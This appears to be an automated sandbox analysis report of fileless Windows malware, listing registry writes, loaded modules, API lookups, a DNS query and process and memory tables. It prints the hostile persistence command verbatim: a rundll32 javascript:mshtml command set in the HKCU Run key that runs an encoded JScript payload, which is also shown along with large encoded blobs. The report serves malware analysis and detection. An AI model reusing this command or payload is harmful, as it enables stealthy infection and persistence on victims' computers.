mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
Fn
Module (105)
+
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x765b0000 True 1
Fn
Load ntdll.dll base_address = 0x77560000 True 1
Fn
Load WS2_32.dll base_address = 0x75380000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77100000 True 1
Fn
Load WININET.dll base_address = 0x76be0000 True 1
Fn
Load RPCRT4.dll base_address = 0x753c0000 True 1
Fn
Load imagehlp.dll base_address = 0x75760000 True 1
Fn
Load USERENV.dll base_address = 0x74a50000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76760000 True 1
Fn
Load ole32.dll base_address = 0x75570000 True 1
Fn
Load msvcrt.dll base_address = 0x75260000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Fn
Get Handle c:\windows\syswow64\ws2_32.dll base_address = 0x75380000 True 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Fn
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x76be0000 True 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Fn
Get Handle c:\windows\syswow64\imagehlp.dll base_address = 0x75760000 True 1
Fn
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x74a50000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 2
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Fn
Get Handle c:\windows\syswow64\dllhost.exe base_address = 0x190000 True 1
Fn
Get Filename c:\windows\syswow64\dllhost.exe process_name = c:\windows\syswow64\dllhost.exe, file_name_orig = C:\Windows\syswow64\dllhost.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 2
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 16, address_out = 0x75386b0e True 2
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7712c45b True 2
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x76bed075 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 2
Fn
Get Address c:\windows\syswow64\imagehlp.dll function = CheckSumMappedFile, address_out = 0x75768303 True 2
Fn
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x74a51a7a True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7558b636 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x7757fa98 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x7757ff14 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77593164 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 115, address_out = 0x75383ab2 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 3, address_out = 0x75383918 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 19, address_out = 0x75386f01 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 4, address_out = 0x75386bdd True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75397673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 23, address_out = 0x75383eb8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7712ecc7 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x771100aa True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x7710d11c True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x7710c5e6 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x775bd598 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x765c328c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x765c7a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76642c21 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x765c1282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x765c53c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x765e9d3f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x765e276c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x765dd802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x765dd5b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x765c43ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x765dd9e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x765dd9b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x765c49d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x767746ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x767748ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x767714b3 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = _beginthreadex, address_out = 0x7527132e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 1
Fn
System (3)
+
Operation Additional Information Success Count Logfile
Sleep duration = 5000 milliseconds (5.000 seconds) True 2
Fn
Get Info type = Operating System False 1
Fn
Network Behavior
DNS (1)
+
Operation Additional Information Success Count Logfile
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 1
Fn
Process #5: rundll32.exe
(Host: 32, Network: 0)
+
Information Value
ID #5
File Name c:\windows\system32\rundll32.exe
Command Line "C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:14, Reason: Autostart
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:58
OS Process Information
+
Information Value
PID 0x674
Parent PID 0x54c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 678
0x 338
0x 4F4
0x 55C
0x 544
0x 598
0x 5DC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
  • Region Actions
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True True False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False
  • Region Actions
msctf.dll.mui 0x002d0000 0x002d0fff Memory Mapped File Readable, Writable False False False
  • Region Actions
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True True False
oleaccrc.dll 0x00330000 0x00330fff Memory Mapped File Readable False False False
  • Region Actions
wshom.ocx 0x00340000 0x00353fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000005f0000 0x005f0000 0x00770fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000780000 0x00780000 0x01b7ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000001b80000 0x01b80000 0x01ec2fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed1fff Pagefile Backed Memory Readable True False False
  • Region Actions
